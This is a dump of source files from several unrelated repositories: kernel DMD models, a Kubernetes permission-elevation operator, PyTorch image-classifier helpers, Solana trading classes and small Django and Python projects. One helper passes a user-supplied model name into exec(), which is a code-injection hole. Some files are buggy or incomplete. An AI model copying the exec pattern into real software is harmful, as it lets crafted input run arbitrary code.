generated_gradPhi_dot_f_array = self.gen_rff_features_dot(Xdot,X)
elif self.dict == 'nystrom':
pass
else:
raise NotImplementedError("the type of " + self.dict + " is not implemented yet!")
return generated_gradPhi_dot_f_array
```
#### File: SKDMD/MODEL_SRC/ckdmd.py
```python
import sys
import numpy as np
sys.path.insert(0, '../../../')
from SKDMD.MODEL_SRC.kdmd import KDMD
from SKDMD.PREP_DATA_SRC.source_code.lib.utilities import timing
class CKDMD(KDMD):
"""
Class for Kernel DMD
with kernel as
* Gaussian kernel
* polynomial kernel
* linear kernel DMD
"""
def __init__(self, config):
super(CKDMD, self).__init__(config)
self.type = 'c'
self.model_dir = self.case_dir + '/' + self.type + '-kdmd-s' + str(config['sigma']) + '-r' + str(config['reduced_rank'])
self.makedir(self.model_dir)
def compute_deigphi_dt(self, x, xdot):
# compute Ahat between x and self.X
if self.kernel == 'linear':
Ahat = self.computeKernelArray(xdot, self.X)
elif self.kernel == 'gaussian':
# dot_x^i_k * (x^i_k - x^j_k) scalar field from inner product
Ahat_1 = np.tensordot(np.ones(self.X.shape[0]), xdot, axes=0)
Z = np.tensordot(np.ones(self.X.shape[0]), x, axes=0)
Z2 = np.tensordot(np.ones(x.shape[0]), self.X, axes=0)
ZT = np.transpose(Z2,axes=(1,0,2))
ZV = Z - ZT
Ahat_2 = np.einsum('ijk,ijk->ji',Ahat_1,ZV)
# elementwise multiplication with the last kernel thing
newGhat = self.computeKernelArray(x, self.X)
Ahat = Ahat_2 * newGhat * -2.0 / (self.sigma_gaussian**2)
elif self.kernel == 'polynomial':
Ahat_1 = np.matmul(xdot, np.transpose(self.X))
newGhat = self.computeKernelArray(x, self.X)
Ahat = self.power * np.power(newGhat, (self.power - 1)/self.power) * Ahat_1
else:
raise NotImplementedError("this kernel: " + str(self.kernel) + " is not implemented!")
# then compute deigen_phi_dt
deigen_phi_dt = np.matmul(np.matmul(np.matmul(Ahat, self.Q), self.inverse_sigma), self.Koopman['eigenvectorHat'])
return deigen_phi_dt
def computeAhat(self, X, Xdot):
if self.kernel == 'linear':
Ahat = np.matmul(Xdot, np.transpose(X))
elif self.kernel == 'gaussian':
# dot_x^i_k * (x^i_k - x^j_k) scalar field from inner product
Ahat_1 = np.tensordot(np.ones(Xdot.shape[0]), Xdot, axes=0)
Z = np.tensordot(np.ones(X.shape[0]), X, axes=0)
ZT = np.transpose(Z,axes=(1,0,2))
ZV = Z - ZT
Ahat_2 = np.einsum('ijk,ijk->ji',Ahat_1,ZV)
# elementwise multiplication with the last kernel thing
Ahat = Ahat_2 * self.Ghat * -2.0 / (self.sigma_gaussian**2)
elif self.kernel == 'polynomial':
Ahat_1 = np.matmul(Xdot, np.transpose(X))
Ahat = self.power * np.power(self.Ghat, (self.power - 1)/self.power) * Ahat_1
else:
raise NotImplementedError("this kernel: " + str(self.kernel) + " is not implemented!")
return Ahat
@timing
def train(self, X, Xdot):
"""
Given X and Xdot, training for Koopman eigenfunctions, eigenvalues, eigenvectors, and Koopman modes
:type X: np.ndarray
:param X: state of the system
:type Xdot: np.ndarray
:param Xdot: time derivative of the state of the system
"""
self.X = X
self.Xdot = Xdot
# prepare scaler
self.prepare_scaler(self.X)
# compute Koopman tuples
self.compute_Koopman_analysis()
```
#### File: SKDMD/MODEL_SRC/lib_analytic_model.py
```python
import sys
import numpy as np
sys.dont_write_bytecode = True
def F_simple_2d_system(x):
"""Simple toy problem with known Koopman eigenfunctions in `Lusch paper`_.
.. warning::
Returned Jacobian is not used any more.
.. _Lusch paper: https://www.nature.com/articles/s41467-018-07210-0/
Note:
In this example, :math:`\mu` = -0.05, :math:`\lambda` = -1.0.
Args:
x (:obj:`numpy.ndarray`): system state.
Returns:
:obj:`np.ndarray` : time derivative.
"""
mu = -0.05
plambda = -1.0
F = np.zeros(x.shape)
F[0] = mu*x[0]
F[1] = plambda*(x[1] - x[0]**2)
return F
def F_duffing_2d_system(x):
"""Simple toy problem with multiple attractors in `Otto's paper`_.
.. _Otto's paper: https://arxiv.org/abs/1712.01378
.. warning::
Returned Jacobian is not used any more.
Note:
In this example, :math:`delta=0.5`, :math:`beta=-1.0`, :math:`alpha=1.0`.
Args:
x (:obj:`numpy.ndarray`): system state.
Returns:
:obj:`np.ndarray` : time derivative.
"""
delta = 0.5
beta = -1.0
alpha = 1.0
F = np.zeros(x.shape)
F[0] = x[1]
F[1] = -delta * x[1] - x[0] * (beta + alpha * x[0]**2)
return F
``` |
{
"source": "jimmyjamesbaldwin/kube-elevate",
"score": 2
} |
#### File: jimmyjamesbaldwin/kube-elevate/handlers.py
```python
import kopf
import kubernetes
import yaml
import os
import requests
import json
import time
from datetime import datetime, timedelta
from kubernetes.client.rest import ApiException
#@<EMAIL>()
#def configure(settings: kopf.OperatorSettings, **_):
# settings.posting.level = logging.WARNING
# settings.watching.connect_timeout = 1 * 60
# settings.watching.server_timeout = 10 * 60
@kopf.on.create('jbaldwin.org', 'v1', 'elevatepermissions')
def create_fn(meta, spec, namespace, logger, body, **kwargs):
name = body['metadata']['name']
namespace = body['metadata']['namespace']
# check if servicenow has an open incident for this - this needs testing!
# https://gallery.technet.microsoft.com/scriptcenter/Get-all-open-ServiceNow-16142d9a
servicenow_url = "https://myservicenow.ruffer.local/"
servicenow_inc = "INC1234567"
get_servicenow_incident_url = servicenow_url + "/api/now/v1/table/incident?sysparm_query=number=" + servicenow_inc
#get_servicenow_incident_response = requests.get(get_servicenow_incident_url, auth=('myusername', 'mybasic<PASSWORD>'))
#if get_servicenow_incident_response.status_code != 200:
# logger.error("Failed to retrieve ServiceNow Inc")
# exit
#json_data = json.loads(get_servicenow_incident_response.json())
#if json_data['active'] != "true":
# logger.error()
#https://stackoverflow.com/questions/35283649/error-in-creating-an-incident-in-servicenow
batch_api = kubernetes.client.BatchV1beta1Api()
#cron_job = batch_api.create_namespaced_cron_job(body=data, namespace=namespace)
#kopf.adopt(cron_job, owner=body)
#logger.info(f"asdasdasd: %s", cron_job)
# create role (one-off setup per namespace)
path = os.path.join(os.path.dirname(__file__), '/templates/role.yaml')
tmpl = open(path, 'rt').read()
text = tmpl.format(namespace="default")
data = yaml.safe_load(text)
batch_api = kubernetes.client.RbacAuthorizationV1Api()
try:
batch_api.create_namespaced_role(body=data, namespace=namespace)
except ApiException as e:
if (e.status == 409): # conflict
logger.debug("Role has already been created in this namespace, handling this exception...")
# create rolebinding to elevate user's permissions
path = os.path.join(os.path.dirname(__file__), '/templates/rolebinding.yaml')
tmpl = open(path, 'rt').read()
now=int(datetime.timestamp(datetime.now()))
expiry=int(datetime.timestamp(datetime.now() + timedelta(hours=body['spec']['lease-hours'])))
incident_ticket=body['spec']['incident-ticket']
rb_name = "kube-elevate-rb-readwrite-" + body['spec']['incident-ticket'] + "-" + str(int(time.time()))
text = tmpl.format(user=body['spec']['username'],
namespace=body['spec']['namespace'],
expirytime=expiry,
rolebindingname=rb_name)
rb = yaml.safe_load(text)
kopf.adopt(rb, owner=body)
roleBinding = batch_api.create_namespaced_role_binding(body=rb, namespace=namespace)
return {'message': 'Rolebinding created'}
@kopf.on.delete('jbaldwin.org', 'v1', 'elevatepermissions')
def delete(body, **kwargs):
msg = f"Database {body['metadata']['name']} and its Pod / Service children deleted"
return {'message': msg}
``` |
{
"source": "JimmyJimmbles/aipnd-project",
"score": 2
} |
#### File: JimmyJimmbles/aipnd-project/helpers.py
```python
import PIL
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from collections import OrderedDict
import numpy as np
import json
# Global variables
device_check = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
criterion = nn.NLLLoss()
def load_data(data_dir='./flowers'):
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# Set transformation vars
means = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
img_size = 224
max_batch_size = 32
# Set data transformation dict to house all transforms
data_transforms = {
'training': transforms.Compose([transforms.RandomRotation(60),
transforms.RandomResizedCrop(img_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(means, std)]),
'validation': transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)]),
'testing': transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)])
}
# Set image datasets dict to house all transforms
image_datasets = {
'training': datasets.ImageFolder(train_dir, transform=data_transforms['training']),
'validation': datasets.ImageFolder(valid_dir, transform=data_transforms['validation']),
'testing': datasets.ImageFolder(test_dir, transform=data_transforms['testing']),
}
# Set all data loaders
dataloaders = {
'training': torch.utils.data.DataLoader(image_datasets['training'], batch_size=max_batch_size, shuffle=True),
'validation': torch.utils.data.DataLoader(image_datasets['validation'], batch_size=max_batch_size, shuffle=True),
'testing': torch.utils.data.DataLoader(image_datasets['testing'], batch_size=max_batch_size, shuffle=True)
}
return dataloaders, image_datasets
def label_mapping(file_name):
with open(file_name, 'r') as f:
cat_to_name = json.load(f)
return cat_to_name
def network_setup(model='vgg16', hidden_layers=[2000, 500, 250], lr=0.001, device='cpu'):
if type(model) == type(None):
print("No model was provided, defaulting to vgg16.")
nn_model = models.vgg16(pretrained=True)
if model == 'vgg16':
nn_model = models.vgg16(pretrained=True)
elif model == 'densenet121':
nn_model = models.densenet121(pretrained=True)
else:
exec("nn_model = models.{}(pretrained = True)".format(model))
# Freeze parameters
for param in nn_model.parameters():
param.requires_grad = False
cat_to_name = label_mapping('cat_to_name.json')
output_len = len(cat_to_name)
input_len = nn_model.classifier[0].in_features
classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(input_len, hidden_layers[0])),
('relu1', nn.ReLU()),
('drop1', nn.Dropout(0.2)),
('fc2', nn.Linear(
hidden_layers[0], hidden_layers[1])),
('relu2', nn.ReLU()),
('drop2', nn.Dropout(0.15)),
('fc3', nn.Linear(
hidden_layers[1], hidden_layers[2])),
('relu3', nn.ReLU()),
('drop3', nn.Dropout(0.1)),
('fc4', nn.Linear(
hidden_layers[2], output_len)),
('output', nn.LogSoftmax(dim=1))
]))
# Set the new classifier to the network
nn_model.classifier = classifier
criterion = nn.NLLLoss()
optimizer = optim.Adam(nn_model.classifier.parameters(), lr)
nn_model.to(device)
return nn_model, criterion, optimizer
def validation(model, dataloader, criterion, device='cpu'):
loss = 0
accuracy = 0
for ii, (inputs, labels) in enumerate(dataloader):
# Set inputs and labels based on device
inputs, labels = inputs.to(device), labels.to(device)
# forward pass to get our log probs
log_ps = model.forward(inputs)
batch_loss = criterion(log_ps, labels)
loss += batch_loss.item()
# calc the accuracy
ps = torch.exp(log_ps)
# get top 1 from topk
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
return loss, accuracy
def train_network(nn_model, dataloaders, optimizer, epochs=5, print_every=30, device='cpu'):
steps = 0
# get dataloaders
if type(dataloaders) == type(None):
dataloaders, image_datasets = load_data('./flowers')
print("Traning has started, this may take a while...")
for e in range(epochs):
running_loss = 0
for inputs, labels in dataloaders['training']:
steps += 1
# Set inputs and labels based on device
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# Get log probabbilities from forward pass
logps = nn_model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
nn_model.eval()
with torch.no_grad():
validation_loss, accuracy = validation(
nn_model, dataloaders['validation'], criterion)
print("Epoch: {}/{}".format(e + 1, epochs),
"Training Loss: {:.3f}".format(
running_loss / print_every),
"Validation Loss: {:.3f}".format(
validation_loss / len(dataloaders['validation'])),
"Validation Accuracy: {:.3f}".format(accuracy / len(dataloaders['validation'])))
running_loss = 0
nn_model.train()
print("Traning Ended!")
def save_nn_checkpoint(model_dict, file_name):
""" Helper funciton to quickly save the nn """
torch.save(model_dict, file_name)
print("Model has been saved as {}".format(file_name))
def load_nn_checkpoint(filepath):
checkpoint = torch.load(filepath)
hidden_layers = [2000, 500, 250]
lr = 0.001
nn_model, criterion, optimizer = network_setup(
checkpoint['arch'], hidden_layers, lr)
nn_model.load_state_dict(checkpoint['state_dict'])
nn_model.classifier = checkpoint['classifier']
nn_model.class_to_idx = checkpoint['class_to_idx']
return nn_model
def process_image(image):
# Set transformation vars
means = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
img_size = 224
max_batch_size = 32
pil_image = PIL.Image.open(image)
image_transforms = transforms.Compose([transforms.Resize(img_size + max_batch_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(means, std)])
image_tensor = image_transforms(pil_image)
return image_tensor
def predict(image_path, model, topk=5):
# answer found here: https://stackoverflow.com/questions/9777783/suppress-scientific-notation-in-numpy-when-creating-array-from-nested-list
np.set_printoptions(suppress=True, formatter={
'float_kind': '{:0.4f}'.format})
# set model to inference mode and use cpu
model.to('cpu')
model.eval()
image_tensor = process_image(image_path)
# fix for dim found here: https://discuss.pytorch.org/t/expected-stride-to-be-a-single-integer-value-or-a-list/17612
image_tensor = image_tensor.unsqueeze_(0)
with torch.no_grad():
log_ps = model.forward(image_tensor)
# get top probabilties and labels
ps = torch.exp(log_ps)
ps_top, labels_top = ps.topk(topk)
# array for probabilties and labels used for mapping labels to their string name
ps_top_arr = np.array(ps_top)[0]
labels_top_arr = np.array(labels_top[0])
class_to_idx = model.class_to_idx
idx_to_class = {x: y for y, x in class_to_idx.items()}
label_list = []
for x in labels_top_arr:
label_list += [idx_to_class[x]]
return ps_top_arr, label_list
``` |
{
"source": "jimmyjimmy94/mango-explorer",
"score": 2
} |
#### File: mango-explorer/mango/perpmarketoperations.py
```python
import typing
from decimal import Decimal
from solana.publickey import PublicKey
from .account import Account
from .combinableinstructions import CombinableInstructions
from .constants import SYSTEM_PROGRAM_ADDRESS
from .context import Context
from .marketoperations import MarketOperations
from .orders import Order
from .perpmarketinstructionbuilder import PerpMarketInstructionBuilder
from .perpmarket import PerpMarket
from .wallet import Wallet
# # 🥭 PerpMarketOperations
#
# This file deals with placing orders for Perps.
#
class PerpMarketOperations(MarketOperations):
def __init__(self, market_name: str, context: Context, wallet: Wallet,
market_instruction_builder: PerpMarketInstructionBuilder,
account: Account, perp_market: PerpMarket):
super().__init__()
self.market_name: str = market_name
self.context: Context = context
self.wallet: Wallet = wallet
self.market_instruction_builder: PerpMarketInstructionBuilder = market_instruction_builder
self.account: Account = account
self.perp_market: PerpMarket = perp_market
def cancel_order(self, order: Order, ok_if_missing: bool = False) -> typing.Sequence[str]:
self.logger.info(f"Cancelling {self.market_name} order {order}.")
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
cancel: CombinableInstructions = self.market_instruction_builder.build_cancel_order_instructions(
order, ok_if_missing=ok_if_missing)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, self.account.address)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank)
settle = self.market_instruction_builder.build_settle_instructions()
return (signers + cancel + crank + settle).execute(self.context)
def place_order(self, order: Order) -> Order:
client_id: int = self.context.generate_client_id()
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
order_with_client_id: Order = order.with_client_id(client_id)
self.logger.info(f"Placing {self.market_name} order {order_with_client_id}.")
place: CombinableInstructions = self.market_instruction_builder.build_place_order_instructions(
order_with_client_id)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, self.account.address)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank)
settle = self.market_instruction_builder.build_settle_instructions()
(signers + place + crank + settle).execute(self.context)
return order_with_client_id
def settle(self) -> typing.Sequence[str]:
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
settle = self.market_instruction_builder.build_settle_instructions()
return (signers + settle).execute(self.context)
def crank(self, limit: Decimal = Decimal(32)) -> typing.Sequence[str]:
signers: CombinableInstructions = CombinableInstructions.from_wallet(self.wallet)
accounts_to_crank = self.perp_market.accounts_to_crank(self.context, None)
crank = self.market_instruction_builder.build_crank_instructions(accounts_to_crank, limit)
return (signers + crank).execute(self.context)
def create_openorders(self) -> PublicKey:
return SYSTEM_PROGRAM_ADDRESS
def ensure_openorders(self) -> PublicKey:
return SYSTEM_PROGRAM_ADDRESS
def load_orders(self) -> typing.Sequence[Order]:
return self.perp_market.orders(self.context)
def load_my_orders(self) -> typing.Sequence[Order]:
all_orders = self.perp_market.orders(self.context)
return list([o for o in all_orders if o.owner == self.account.address])
def __str__(self) -> str:
return f"""« 𝙿𝚎𝚛𝚙𝚜𝙾𝚛𝚍𝚎𝚛𝙿𝚕𝚊𝚌𝚎𝚛 [{self.market_name}] »"""
```
#### File: mango-explorer/mango/tokenvalue.py
```python
import logging
import typing
from decimal import Decimal
from solana.publickey import PublicKey
from solana.rpc.types import TokenAccountOpts
from .context import Context
from .token import Token
# # 🥭 TokenValue class
#
# The `TokenValue` class is a simple way of keeping a token and value together, and
# displaying them nicely consistently.
#
class TokenValue:
def __init__(self, token: Token, value: Decimal):
self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)
self.token = token
self.value = value
def shift_to_native(self) -> "TokenValue":
new_value = self.token.shift_to_native(self.value)
return TokenValue(self.token, new_value)
@staticmethod
def fetch_total_value_or_none(context: Context, account_public_key: PublicKey, token: Token) -> typing.Optional["TokenValue"]:
opts = TokenAccountOpts(mint=token.mint)
token_accounts = context.client.get_token_accounts_by_owner(account_public_key, opts)
if len(token_accounts) == 0:
return None
total_value = Decimal(0)
for token_account in token_accounts:
token_balance: Decimal = context.client.get_token_account_balance(token_account["pubkey"])
total_value += token_balance
return TokenValue(token, total_value)
@staticmethod
def fetch_total_value(context: Context, account_public_key: PublicKey, token: Token) -> "TokenValue":
value = TokenValue.fetch_total_value_or_none(context, account_public_key, token)
if value is None:
return TokenValue(token, Decimal(0))
return value
@staticmethod
def report(values: typing.Sequence["TokenValue"], reporter: typing.Callable[[str], None] = print) -> None:
for value in values:
reporter(f"{value.value:>18,.8f} {value.token.name}")
@staticmethod
def find_by_symbol(values: typing.Sequence[typing.Optional["TokenValue"]], symbol: str) -> "TokenValue":
found = [
value for value in values if value is not None and value.token is not None and value.token.symbol_matches(symbol)]
if len(found) == 0:
raise Exception(f"Token '{symbol}' not found in token values: {values}")
if len(found) > 1:
raise Exception(f"Token '{symbol}' matched multiple tokens in values: {values}")
return found[0]
@staticmethod
def find_by_mint(values: typing.Sequence[typing.Optional["TokenValue"]], mint: PublicKey) -> "TokenValue":
found = [value for value in values if value is not None and value.token is not None and value.token.mint == mint]
if len(found) == 0:
raise Exception(f"Token '{mint}' not found in token values: {values}")
if len(found) > 1:
raise Exception(f"Token '{mint}' matched multiple tokens in values: {values}")
return found[0]
@staticmethod
def find_by_token(values: typing.Sequence[typing.Optional["TokenValue"]], token: Token) -> "TokenValue":
return TokenValue.find_by_mint(values, token.mint)
@staticmethod
def changes(before: typing.Sequence["TokenValue"], after: typing.Sequence["TokenValue"]) -> typing.Sequence["TokenValue"]:
changes: typing.List[TokenValue] = []
for before_balance in before:
after_balance = TokenValue.find_by_token(after, before_balance.token)
result = TokenValue(before_balance.token, after_balance.value - before_balance.value)
changes += [result]
return changes
def __add__(self, token_value_to_add: "TokenValue") -> "TokenValue":
if self.token != token_value_to_add.token:
raise Exception(
f"Cannot add TokenValues from different tokens ({self.token} and {token_value_to_add.token}).")
return TokenValue(self.token, self.value + token_value_to_add.value)
def __sub__(self, token_value_to_subtract: "TokenValue") -> "TokenValue":
if self.token != token_value_to_subtract.token:
raise Exception(
f"Cannot subtract TokenValues from different tokens ({self.token} and {token_value_to_subtract.token}).")
return TokenValue(self.token, self.value - token_value_to_subtract.value)
def __eq__(self, other: typing.Any) -> bool:
if isinstance(other, TokenValue) and self.token == other.token and self.value == other.value:
return True
return False
def __str__(self) -> str:
name = "« 𝚄𝚗-𝙽𝚊𝚖𝚎𝚍 𝚃𝚘𝚔𝚎𝚗 »"
if self.token and self.token.name:
name = self.token.name
return f"« 𝚃𝚘𝚔𝚎𝚗𝚅𝚊𝚕𝚞𝚎: {self.value:>18,.8f} {name} »"
def __repr__(self) -> str:
return f"{self}"
``` |
{
"source": "jimmyjones2/community",
"score": 3
} |
#### File: community/pa-to-es/result_parser.py
```python
import json
class ResultParser():
''' Construct with the text response from calling performance analyzer. Use
the records() method to iterate over the response, retrieving a single
Elasticsearch doc with each call. '''
def __init__(self, metric, response_text):
'''response_text is the body of the response to the GET request.'''
self.response_json = json.loads(response_text)
self.metric = metric
def _unpack_record(self, fields, record):
''' Match the field names with their values in the record. If there's no
applicable value for the field (it's "null"), don't add the field to
the doc. Returns a dict, which is the basis for the doc.'''
ret = {'metric': self.metric.name}
for field_name, value in zip(fields, record):
if value is None or value == 'null':
continue
ret[field_name] = value
return ret
def records(self):
''' Iterates the response, yielding one dict at a time with a single
metric and dimension
A word on the API. PA returns a record for each combination
of the requested dimensions. If a dimension doesn't bear on that
particular metric, PA returns the string "null". To create the
ES doc, you want to expose the combinations of dimensions that
have values for that metric, skipping dimensions that have
"null". The null dimensions are stripped out in _unpack_record. '''
for node_name, values in self.response_json.items():
timestamp = values['timestamp']
data = values['data']
if not data:
break
field_names = [x['name'] for x in data['fields']]
records = data['records']
for record in records:
doc = self._unpack_record(field_names, record)
if not doc:
continue
doc['node_name'] = node_name
doc['@timestamp'] = timestamp
doc['agg'] = self.metric.agg
yield doc
``` |
{
"source": "Jimmyjtc001/assignment1",
"score": 3
} |
#### File: Jimmyjtc001/assignment1/a1_t1_3.py
```python
def f_to_c(Jimmy):
#This formula is (f-32)*5/9
# I took this formula from this link: //contractor quote
c = (f-32)*5/9
return c
f = 60
c = f_to_c(f)
print("Fahrenheit is" + str(f) + "is" + str(c) + "in Celius")
```
#### File: Jimmyjtc001/assignment1/a1_t1_4.py
```python
def f_to_k(Jimmy):
# Forumla = (f-32)*5/9+273.15
# I took this formula from this link: http://contractor quote
k = (f-32)*5/9+273.15
return k
f = 60
k = f_to_k(f)
print("Fahrenheit is" + str(f) + "is" + str(k) + "in Kelvin")
``` |
{
"source": "Jimmyjtc001/assignment2",
"score": 4
} |
#### File: Jimmyjtc001/assignment2/main.py
```python
import os
from library.temperature import c_to_f
def get_command_input():
print("Indoor Air Quality Monitoring Command Console\n")
print("Please select from the following options:")
print("(A) Add reading")
print("(B) List readings")
print("(C) Calculate")
print("(D) Exit\n")
command = input("Input: ")
os.system("clear")
return command
def get_readings():
print("Please input")
temperature = input("Temperature (degrees): ")
humidity = input("Humidity (%): ")
readings = {
"temperature": temperature,
"humidity": humidity
}
os.system("clear")
print("* * * * * * * * * * * * * *")
print("Successfully saved reading")
print("* * * * * * * * * * * * * *")
print("\nHit enter key to return to the menu")
input()
os.system("clear")
return readings
def main():
# This variable controls the main runtime loop
# of our application. If this variable is False
# then our application should terminal.
main_loop_is_running = True
readings = []
while main_loop_is_running:
command = get_command_input()
if command == "A":
data_reading = get_readings()
readings.append(data_reading)
elif command == "B":
print("TODO: List readings GUI page")
elif command == "C":
print("TODO: Calculate")
elif command in ["D", "d", "(D)", "(d)"]:
main_loop_is_running = False
if __name__ == "__main__":
main()
import os
import statistics
TEMPERATURE_ID = 1
HUMIDITY_ID = 2
PRESSURE_ID = 3
class TimeSeriesDatum:
id = 0 # 1=TEMP, 2=HUMID, 3=PRESS, etc.
value = 0
time = 0
def __init__(self, id, value, time):
self.id = id
self.value = value
self.time = time
class Instrument:
# Member variables
data = []
def get_values_by_id(self, id):
values = []
for datum in self.data:
if datum.id == id:
values.append(datum.value)
return values
def get_mean_by_id(self, id):
values = self.get_values_by_id(id)
mean = statistics.mean(values)
return mean
def get_median_by_id(self, id):
values = self.get_values_by_id(id)
median = statistics.median(values)
return median
def print_calculation_by_id(self, id):
if id == TEMPERATURE_ID:
print("Temperature")
if id == HUMIDITY_ID:
print("Humidity")
mean = self.get_mean_by_id(id)
median = self.get_median_by_id(id)
print("Mean:", mean)
print("Median:", median)
print("\n")
def add_datum(self, id, value, time):
datum = TimeSeriesDatum(id, value, time)
self.data.append(datum)
tool = Instrument()
tool.add_datum(TEMPERATURE_ID, 25, 1)
tool.add_datum(TEMPERATURE_ID, 26, 2)
tool.add_datum(TEMPERATURE_ID, 29, 3)
tool.add_datum(HUMIDITY_ID, 80, 1)
tool.add_datum(HUMIDITY_ID, 75, 2)
tool.add_datum(HUMIDITY_ID, 50, 3)
tool.print_calculation_by_id(TEMPERATURE_ID)
tool.print_calculation_by_id(HUMIDITY_ID)
def get_commmand():
print("Indoor Air Quality Monitoring Command Console")
print("Please select from the following options:")
print("1 - Add reading")
print("2 - List readings")
print("3 - Calculate")
print("4 - Exit")
command = int(input("Choose option: "))
os.system("clear")
return command
is_running = True
while is_running:
command = get_commmand()
if command == 1:
print("add")
if command == 2:
print("list")
if command == 3:
print("calc")
if command == 4:
is_running = False
``` |
{
"source": "Jimmyjtc001/indoorair-webapp-a",
"score": 2
} |
#### File: indoorair/profilebyjimmy/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
def retrieve_profile_page(request):
return render(request, "profilebyjimmy/retrieve.html",{},)
def update_profile_page(request):
return render(request, "profilebyjimmy/update.html",{},)
def update_profile_api(request):
return JsonResponse({
})
def retrieve_profile_api(request):
return JsonResponse({
})
``` |
{
"source": "Jimmyjtc001/indoorair-webapp-b",
"score": 2
} |
#### File: indoorair/gateway/serializers.py
```python
from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from rest_framework.validators import UniqueValidator
class RegisterSerializer(serializers.Serializer):
first_name = serializers.CharField()
last_name = serializers.CharField(required = False)
email = serializers.EmailField(
validators=[
UniqueValidator(queryset=User.objects.all())
]
)
username = serializers.CharField(
validators=[
UniqueValidator(queryset=User.objects.all())
]
)
password = serializers.CharField(write_only = True)
def create(self, validated_data):
first_name = validated_data.get('first_name')
last_name = validated_data.get('last_name', None)
email = validated_data.get('email')
username = validated_data.get('username')
password = <PASSWORD>('password')
user = User.objects.create_user(username, email, password)
user.last_name = last_name
user.first_name = first_name
user.save()
return user
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def create(self, validated_data):
username = validated_data.get('username', None)
password = validated_data.get('password', None)
request=self.context.get(request)
try:
user = authenticate(username=username, password=password)
if user:
login(request, user)
return user
except Exception as e:
print(e)
raise serializers.ValidationError('Please enter your true username or password')
``` |
{
"source": "jimmykamau/2048-AI",
"score": 2
} |
#### File: jimmykamau/2048-AI/PlayerAI_3.py
```python
from random import randint
from BaseAI_3 import BaseAI
class PlayerAI(BaseAI):
def getMove(self, grid):
moves = grid.getAvailableMoves()
return moves[1] if moves else None
``` |
{
"source": "jimmykamau/couscous",
"score": 2
} |
#### File: v1/debtor/admin.py
```python
from django.contrib import admin
from .models import Debtor
class DebtorAdmin(admin.ModelAdmin):
exclude = ['created_by']
list_display = (
'email', 'open_invoices', 'paid_invoices',
'overdue_invoices'
)
def get_queryset(self, request):
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def save_model(self, request, obj, form, change):
obj.created_by = request.user
super().save_model(request, obj, form, change)
def has_change_permission(self, request, obj=None):
if not obj:
return True
if obj.created_by == request.user:
return True
return False
def open_invoices(self, obj):
return obj.open_invoices
def paid_invoices(self, obj):
return obj.paid_invoices
def overdue_invoices(self, obj):
return obj.overdue_invoices
has_delete_permission = has_change_permission
admin.site.register(Debtor, DebtorAdmin)
```
#### File: debtor/tests/test_views.py
```python
import random
from django.urls import reverse
from rest_framework.test import APITestCase
import couscous.v1.invoice.tests.factories as invoice_factories
import couscous.v1.tests.factories as couscous_factories
from couscous.v1.debtor import logger
from .factories import DebtorFactory
class ListDebtorViewTests(APITestCase):
def setUp(self):
self.admin_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=self.admin_user)
self.debtors = DebtorFactory.create_batch(3, created_by=self.admin_user)
self.invoices = invoice_factories.InvoiceFactory.create_batch(
3, debtor=self.debtors[1]
)
self.url = reverse('v1:list-debtors')
def tearDown(self):
self.client.force_authenticate(user=None)
def test_cannot_list_without_staff_rights(self):
self.admin_user.is_staff = False
self.admin_user.save()
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
def test_list_debtors(self):
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(
len(self.debtors),
len(response.data)
)
self.assertCountEqual(
[
'email', 'iban', 'open_invoices',
'paid_invoices', 'overdue_invoices'
],
response.data[0]
)
def test_cannot_view_other_user_debtors(self):
other_admin = couscous_factories.UserFactory()
self.client.force_authenticate(user=other_admin)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertFalse(response.data)
def test_filter_results(self):
# Filter by invoice status
status = random.choice(
[
("OP", "open_invoices"),
("PA", "paid_invoices"),
("OV", "overdue_invoices")
]
)
url = f"{self.url}?status={status[0]}"
response = self.client.get(url, format='json')
self.assertEqual(200, response.status_code)
for debtor in response.data:
self.assertLess(
0,
debtor[status[1]]
)
# Filter by invoice count
other_invoices = invoice_factories.InvoiceFactory.create_batch(
2, debtor=self.debtors[0]
)
url = f"{self.url}?invoice_count={len(other_invoices)}"
response = self.client.get(url, format='json')
self.assertEqual(200, response.status_code)
random_result = random.choice(response.data)
self.assertEqual(other_invoices[0].debtor.email, random_result['email'])
```
#### File: invoice/tests/test_views.py
```python
from django.urls import reverse
from rest_framework.test import APITestCase
import couscous.v1.debtor.tests.factories as debtor_factories
import couscous.v1.tests.factories as couscous_factories
from couscous.v1.invoice import logger
from .factories import InvoiceFactory
class ListInvoiceViewTests(APITestCase):
def setUp(self):
